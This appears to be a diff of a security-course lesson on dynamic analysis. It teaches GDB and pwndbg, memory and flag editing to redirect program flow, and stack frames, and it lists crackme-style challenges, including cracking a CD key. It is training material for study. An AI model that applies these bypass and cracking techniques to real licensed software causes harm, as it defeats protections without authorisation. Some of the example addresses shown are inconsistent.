hidden you can toy around with. - -Hint: The challenge name is a hint. - -### 05. Challenge - Snooze Me - -I wrote a simple binary that computes the answer to life, the universe and everything. -It swear it works... eventually. - -### 06. Challenge - Phone Home - -To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. - -Unfortunately, the key feature of the application is now unreachable due to a bug. -Can you bypass the impossible condition? - -### 07. Challenge - Chain encoder - -How do you reverse something made to be ireversible, you are welcome to find out in this challenge. - -### 08. Challenge - Simple cdkey - -I found this software but i don't have the cd key, can you crack it for me? +# Dynamic Analysis + +## Introduction + +### Objectives & Rationale + +The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. +In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. + +Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1, RSA. +We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. + +Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. + +With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. + +### Prerequisites + +In the current session we will use GDB extensively. +We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. + +To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). + +The executable used in the demo is called sppb and is the challenge 1 binary. + +### Before GDB + +One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far. + +For the purposes of this session it is a good idea to always run`objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. + +```console +objdump -M intel -d [executable] +``` + +## GDB Basic Commands + +### Getting help with GDB + +Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. +For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: + +```text +# Print info about all help areas available. +# Identify the area of your question. +(gdb) help + +# Print info about available data commands. +# Identify the command you want to learn more about. +(gdb) help data + +# Print info about a specific command. +# Find out more about the command you are searching for. +(gdb) help disassemble +``` + +### Opening a program with GDB + +A program can be opened for debugging in a number of ways. +We can run GDB directly attaching it to a program: + +```console +gdb [executable-file] +``` + +Or we can open up GDB and then specify the program we are trying to attach to using the file or file-exec command: + +```console +$ gdb +(gdb) file [executable-file] +``` + +Furthermore we can attach GDB to a running service if we know its process id: + +```text +gdb --pid [pid_number] +``` + +### Disassembling + +GDB allows disassembling of binary code using the `disassemble` command +(it may be shortened to `disas`). +The command can be issued either on a +memory address or using labels. + +```text +(gdb) disassemble *main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +....Output ommited..... + +(gdb) disassemble 0x080491c9 +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +``` + +### Adding Breakpoints + +Breakpoints are important to suspend the execution of the program being debugged in a certain place. +Adding breakpoints is done with the `break` command. +A good idea is to place a breakpoint at the main function of the program you are trying to exploit. +Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. +This means that we can set a breakpoint for the start of our program in two ways: + +```text +(gdb) break *main (when the binary is not stripped of symbols) +(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) +``` + +The general format for setting breakpoints in GDB is as follows: + +```text +(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] +``` + +Issuing the `break` command with no parameters will place a breakpoint at the current address. +GDB allows using abbreviated forms for all the commands it supports. +Learning these abbreviations comes with time and will greatly improve you work output. +Always be on the lookout for using abbreviated commands + +The abbreviated command for setting breakpoints is simply `b`. + +### Listing Breakpoints + +At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: + +```text +(gdb) info breakpoints +``` + +You can also issue the abbreviated form of the command + +```text +(gdb) i b +``` + +### Deleting Breakpoints + +Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoints number, as it is listed in the output of the +`info breakpoints` command. + +```text +(gdb) delete breakpoints [breakpoint_number] +``` + +You can also delete all active breakpoints by issuing the following the `delete breakpoints` command with no parameters: + +```text +(gdb) delete breakpoints +``` + +Once a breakpoint is set you would normally want to launch the program into execution. +You can do this by issuing the `run` command. +The program will start executing and stop at the first breakpoint you have set. + +```text +(gdb) run +``` + +#### Execution Flow + +Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: + +```text +(gdb) help continue +# Continue program being debugged, after signal or breakpoint. +# If proceeding from breakpoint, a number N may be used as an argument, +# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached). + +(gdb) help stepi +# Step one instruction exactly. +# Argument N means do this N times (or till program stops for another reason). + +(gdb) help nexti +# Step one instruction, but proceed through subroutine calls. +# Argument N means do this N times (or till program stops for another reason). +``` + +You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`). + +If at any point you want to start the program execution from the beginning you can always reissue the `run` command. + +Another technique that can be used for setting breakpoints is using offsets. + +As you already know, each assembly instruction takes a certain number of bytes inside the executable file. +This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. + +```text +(gdb) break *main +Breakpoint 1 at 0x80491d0 +(gdb) run +Starting program: sppb + +Breakpoint 1, 0x80491d0 in main () +(gdb) disassemble main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +.....Output ommited..... +(gdb) break *main+4 +Breakpoint 2 at 0x80491cd +``` + +### Examine and Print, Your Most Powerful Tools + +GDB allows examining of memory locations be them specified as addresses or stored in registers. +The `x` command (for *examine*) is arguably one of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. +The format for the `examine` command is as follows: + +```text +(gdb) x/nfu [address] + n: How many units to print + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + u: Unit + b: Byte + h: Half-word (2 bytes) + w: Word (4 bytes) + g: Giant word (8 bytes) + i: Instruction (read n assembly instructions from the specified memory address) +``` + +In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in registers and variables. +The format for the `print` command is as follows: + +```text +(gdb) p/f [what] + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + i Instruction (read n assembly instructions from the specified memory address) +``` + +For a better explanation please follow through with the following example: + +```text +# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint. +# At this point we want to see which are the following 10 instructions. +(gdb) x/10i 0x80491cd + 0x80491cd : sub esp,0x4 + 0x80491d0 : mov eax,ds:0x804c030 + 0x80491d5 : push 0x0 + 0x80491d7 : push 0x1 + 0x80491d9 : push 0x0 + 0x80491db : push eax + 0x80491dc : call 0x8049080 + +# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion). +# The other parameter will be an address where the input will be stored. +(gdb) x/s 0x804a02a +0x804a02a: "%d" + +# We now set a breakpoint for *main+56. +(gdb) break *0x08049201 +Breakpoint 3 at 0x08049201 +(gdb) continue +Continuing. + +Breakpoint 3, 0x08049201 in main () + +# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. +# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input). +# Take note that in GDB registers are preceded by the "$" character very much like variables. +(gdb) x/d 0xffffcf70 <- (your address) +0xffffcf70: +# Now let's print the contents of the eax register as hexadecimal. +(gdb) p/x $eax +$1 = + +# The diference between p and x can be observed by issuing the following commands: +x/s 0x804a030 +0x804a030: "Your password is: %d. Evaluating it...\n" + +p /s 0x804a030 + +# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). + +# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves. +# As you can see the address holds the memory for the beginning of the string. +# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format +# You can think of it as "x" dereferencing while "p" not dereferencing +``` + +### GDB Command file + +When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. +GDB commands files will allow you to run a specific set of commands automatically after each command you issue manually. +This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the main target when exploiting. + +The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which translates to the same output. + +In order to use this option you must first create your commands file. +This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack. + +The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the session. + +Command file template: + +```text +display/10i $eip +display/x $eax +display/x $ebx +display/x $ecx +display/x $edx +display/x $edi +display/x $esi +display/x $ebp +display/32xw $esp +``` + +In order to view all register values you could use the `x` command. +However the values of all registers can be obtained by running the`info all-registers` command: + +```text +(gdb) info all-registers +eax 0x8048630,134514224 +ecx 0xbffff404,-1073744892 +edx 0xbffff394,-1073745004 +ebx 0xb7fc6ff4,-1208193036 +esp 0xbffff330,0xbffff330 +ebp 0xbffff368,0xbffff368 +esi 0x0,0 +edi 0x0,0 +eip 0x80484e9,0x80484e9 +eflags 0x286,[ PF SF IF ] +cs 0x73,115 +ss 0x7b,123 +ds 0x7b,123 +es 0x7b,123 +fs 0x0,0 +gs 0x33,51 +st0 *value not available* +st1 *value not available* +st2 *value not available* +st3 *value not available* +st4 *value not available* +st5 *value not available* +st6 *value not available* +st7 *value not available* +fctrl 0x37f,895 +fstat 0x0,0 +ftag 0xffff,65535 +fiseg 0x0,0 +fioff 0x0,0 +foseg 0x0,0 +---Type to continue, or q to quit--- +fooff 0x0,0 +fop 0x0,0 +mxcsr 0x1f80,[ IM DM ZM OM UM PM ] +ymm0 *value not available* +ymm1 *value not available* +ymm2 *value not available* +ymm3 *value not available* +ymm4 *value not available* +ymm5 *value not available* +ymm6 *value not available* +ymm7 *value not available* +mm0 *value not available* +mm1 *value not available* +mm2 *value not available* +mm3 *value not available* +mm4 *value not available* +mm5 *value not available* +mm6 *value not available* +mm7 *value not available* +``` + +One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. +Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. +In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter. + +### Using GDB to modify variables + +GDB can be used to modify variables during runtime. +In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches. + +## Pwndbg + +As you can see using GDB can be cumbersome, this is why we recommend using the pwndbg plug-in. +The tutorial as well as the repository of the project can be found here [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg") + +Give the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the`pwndbg` plug-in. +Some of the advantages of using pwngdb include: + +- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) +- Automatic dereferencing and following through of memory locations +- Color coding + +An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). + However, this tutorial is designed with Pwndbg in mind. + +#### Pwndbg Commands + +`pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints: + +```text +Usage: pdis 0x80491d0 +``` + +If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed + +The `stepi` command has the same effect as in GDB however, if you are running Pwndbg you will notice that after each step Pwndbg will automatically print register values, several lines of code from eip +register and a portion of the stack: + +```text +pwndbg> stepi + +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +────────────────────────────────────[ REGISTERS ]──────────────────────────────────── +*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 + EBX 0x0 + ECX 0xa00af61b + EDX 0xffffcfb4 ◂— 0x0 + EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */ +─────────────────────────────────────[ DISASM ]────────────────────────────────────── + 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> + ► 0x80491d5 push 0 + 0x80491d7 push 1 + 0x80491d9 push 0 + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + 0x80491f0 call puts@plt + + 0x80491f5 add esp, 4 +──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── +In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c + 6 execve("/bin/sh", 0, 0); + 7 } + 8 + 9 int main() + 10 { + ► 11 setvbuf(stdout, NULL, _IOLBF, 0); + 12 int readValue = 0; + 13 + 14 printf("Please provide password: \n"); + 15 scanf("%d", &readValue); + 16 +──────────────────────────────────────[ STACK ]────────────────────────────────────── +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── + ► f 0 0x80491d5 main+12 + f 1 0xf7de0fd6 __libc_start_main+262 + +``` + +You can always use the following commands to obtain context at any given moment inside the debug process: + +- `context reg` +- `context code` +- `context stack` +- `context all` + +One additional Pwndbg command which can be used to show values in registers is the `telescope` command. +The command dereferentiates pointer values until it gets to a value and prints out the entire trace. + +The command can be used with both registers and memory addresses: + +```text +pwndbg$ telescope $esp +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +pwndbg> telescope 0xffffcf84 +00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b +04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... +05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' +06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +07:001c│ 0xffffcfa0 ◂— 0x1 +``` + +In the example above, the memory address 0x8048630 was loaded into EAX. +That is why examining the register or the memory location gives the same output. + +For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command It is always a better idea to use Pwndbg commands when available. +However you should also know the basics of using GDB as well. + +#### Altering variables and memory with Pwndbg and GDB + +In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: + +- `$pc - $eip` +- `$sp - $esp` +- `$fp - $ebp` + +In addition to these there are also two registers which can be used to view the processor state `$ps - processor status` + +Values of memory addresses and registers can be altered at execution time. +Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session. + +The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. + +Using GDB the `$eflags` register can be easily modified: + +```text +pwndbg> reg eflags +EFLAGS 0x282 [ cf pf af zf SF IF df of ] +Set the ZF flag +pwndbg> set $eflags |= (1 << 6) +Clear the ZF flag +pwndbg> set $eflags &= ~(1 << 6) +``` + +Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. + +The `set` command (GDB native) can be used to modify values that reside inside memory. + +```text +pwndbg> telescope 0x804a010 +00:0000│ 0x804a010 ◂— 'Please provide password: ' +01:0004│ 0x804a014 ◂— 'se provide password: ' +02:0008│ 0x804a018 ◂— 'rovide password: ' +03:000c│ 0x804a01c ◂— 'de password: ' +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 + +pwndbg> set {char [14]} 0x804a010 = "No pass here" +Written 28 bytes to 0x8048630 +pwndbg> telescope 0x8048630 +00:0000│ 0x804a010 ◂— 'No pass here' +01:0004│ 0x804a014 ◂— 'ass here' +02:0008│ 0x804a018 ◂— 'here' +03:000c│ 0x804a01c ◂— 0x70200000 +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 +``` + +As you can see the string residing in memory at address `0x8048630` has been modified using the `set` command. + +Pwngdb does not offer enhancements in modifying registry values. +For modifying registry values you can use the GDB `set` command. + +``` {.code} +pwngdb> p/x $eax +$10 = 0x1 +pwngdb> set $eax=0x80 +pwngdb> p/x $eax +$11 = 0x80 +``` + +## The Stack + +This section details process of function calling in detail. +Understanding function calling and stack operations during program execution is esential to exploitation. + +The stack is one of the areas of memory which gets the biggest attention in exploitation writing. + +### Stack Growth + +The stack grows from high memory addresses to low memory addresses. + +```text +pwndbg> pdis $eip + + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + ► 0x80491f0 call puts@plt + +pwndbg> p/x $esp +$1 = 0xffffcf6c +pwndbg> si +0x8049050 in puts@plt () +pwndbg> p/x $esp +$5 = 0xffffcf68 +``` + +As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. +The next instruction that is about to be executed is a push (it pushes `0x0` on the stack). +We execute the instruction and then reevaluate the value of `$esp`. +As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). + +### Frame Pointers and Local Function Variables + +Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. + +This container is called a function frame. +The idea behind it is that the processor must know which area of the stack belongs to which function. + +In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. +Can you tell what they are based on the output below? + +```text +pwndbg> break main +Breakpoint 1 at 0x80484c8 +pwndbg> run +[----------------------------------registers-----------------------------------] + EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' + EBX 0x0 + ECX 0xb8a6a751 + EDX 0xffffcfb4 ◂— 0x0 + EDI 0x80490a0 (_start) ◂— xor ebp, ebp + ESI 0x1 + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 ◂— 0x1 + EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] +[-------------------------------------code-------------------------------------] + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 + 0x080491d5 <+12>: push 0x0 + 0x080491d7 <+14>: push 0x1 + 0x080491d9 <+16>: push 0x0 + 0x080491db <+18>: push eax + +[------------------------------------stack-------------------------------------] +00:0000│ esp 0xffffcf70 ◂— 0x1 +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 + +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080491d0 in main () +pwndbg> disass password_accepted + + + 0x080491b2 <+0>: push ebp + 0x080491b3 <+1>: mov ebp,esp + 0x080491b5 <+3>: push 0x0 + 0x080491b7 <+5>: push 0x0 + 0x080491b9 <+7>: push 0x804a008 + 0x080491be <+12>: call 0x8049070 + 0x080491c3 <+17>: add esp,0xc + 0x080491c6 <+20>: nop + 0x080491c7 <+21>: leave + 0x080491c8 <+22>: ret + +``` + +What we did is we created a breakpoint for the start of the main function and then ran the program. +As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. + +We then set a breakpoint for another function called `pass_accepted`, continued execution and entered a password that we know is going to pass validation. +Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. + +The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. + +In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container(`mov ebp,esp`). + +For a visual explanation please see below: + +

+ Sublime's custom image +

+ +As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame. +That is why it is most often referred to as the frame pointer. + +In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function + +If you analyze the instructions at the beginning of main, you can spot these as being: + +- An `and esp,0xfffffff0` instruction. + +- A `sub` insctruction that subtracts a hex value from ESP. + +The first of the two instructions has the purpose of aligning the stack to a specific address boundary. +This is done to increase processor efficiency. +In our specific case, the top of the stack gets aligned to a 16 byte multiple address. + +One of the purposes of the stack inside functions is that of offering address space in which to place local variables. +The second instruction preallocates space for local function variables. + +Let's see how local variables are handled inside assembly code. + +```c +#include +int main() +{ + int a; + a=1; + return 0; +} +``` + +```text +kali@kali:~/sss$ gdb test +GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 +Copyright (C) 2012 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "i686-linux-gnu". +For bug reporting instructions, please see: +... +Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. +pwndbg> break main +Breakpoint 1 at 0x80483ba +pwndbg> run +[----------------------------------registers-----------------------------------] +EAX: 0x1 +EBX: 0xb7fc6ff4 --> 0x1a0d7c +ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c +ESI: 0x0 +EDI: 0x0 +EBP: 0xbffff378 --> 0x0 +ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) +EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x80483b4
:, push ebp + 0x80483b5 :,mov ebp,esp + 0x80483b7 :,sub esp,0x10 +=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 + 0x80483c1 :,mov eax,0x0 + 0x80483c6 :,leave + 0x80483c7 :,ret + 0x80483c8:,nop +[------------------------------------stack-------------------------------------] +0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c +0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) +0012| 0xbffff374 --> 0x0 +0016| 0xbffff378 --> 0x0 +0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) +0024| 0xbffff380 --> 0x1 +0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080483ba in main () +``` + +As you can see the operations that relate to the stack are: + +- The old frame pointer is saved. +- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame). +- `0x10` is subtracted from ESP (reserve space for local variables). +- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1). + +### Function Parameters + +The stack is also used to pass in parameters to functions. + +In the process of calling a function we can define two entities. +The callee (the function that gets called) and the caller (the function that calls). + +When a function is called, the caller pushes the parameters for the callee on the stack. +The parameters are pushed in reverse order. + +When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it's frame. + +At this point it makes sense to remember the following cases: + +- When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. +- When EBP-value is referred to it is generally a referral to a local variable. + +Lets see how this happens with the following code: + +```c +#include + +int add(int a, int b) +{ + int c; + c=a+b; + return c; +} + +int main() +{ + add(10,3); + return 0; +} +``` + +```text +pwndbg> pdis 0x080483ca +Dump of assembler code for function main: + 0x080483ca <+0>:,push ebp #save the old frame pointer + 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer + 0x080483cd <+3>:,sub esp,0x8 #create space for local variables + 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called + 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called + 0x080483df <+21>:,call 0x80483b4 #call the function + 0x080483e4 <+26>:,mov eax,0x0 + 0x080483e9 <+31>:,leave + 0x080483ea <+32>:,ret +End of assembler dump. +pwndbg> pdis 0x080483b4 +Dump of assembler code for function add: + 0x080483b4 <+0>:,push ebp #save the old frame pointer + 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer + 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables + 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) + 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) + 0x080483c0 <+12>:,add eax,edx #add the registers + 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) + 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it + 0x080483c8 <+20>:,leave + 0x080483c9 <+21>:,ret +End of assembler dump. +``` + +As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. + +If you don't understand why the offset for the parameters starts at EBP+0x08 and not EBP follow through with the next section. + +### Calling functions (call and ret) + +When calling a function the callee places the return address on the stack. +This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution. + +The last instruction in functions is usually a `ret` instruction that resumes execution to the callee. + +For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. + +The call instruction could be translated to the following instructions: + +- `push eip` +- `mov eip, address_of_called_function` + +The ret instruction could be translated into `pop eip`. + +The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well: + +

+ +

+ +### Next Section Preview: Buffer Overflows + +Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. + +A buffer overflow takes place when there is a lack of checking regarding boundaries and usually result in complete control of the program's instruction pointer. +This takes place when a buffer overflows its boundaries and overwrites the return address of a function. + +A typical example of buffer overflows can be seen in the following picture: + +

+ +

